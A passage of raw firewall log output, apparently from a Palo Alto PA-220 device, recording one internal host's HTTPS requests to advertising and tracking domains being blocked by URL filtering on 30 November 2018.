States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 
16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:53 PA-220 1,2018/11/30 
16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,"cdn.taboola.com/",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,54.192.7.152,192.168.1.63,54.192.7.152,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,"rules.quantcount.com/",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 
16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 
16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,216.58.194.98,192.168.1.63,216.58.194.98,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,"www.googleadservices.com/",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 
16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 
16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:28 PA-220 1,2018/11/30 
16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
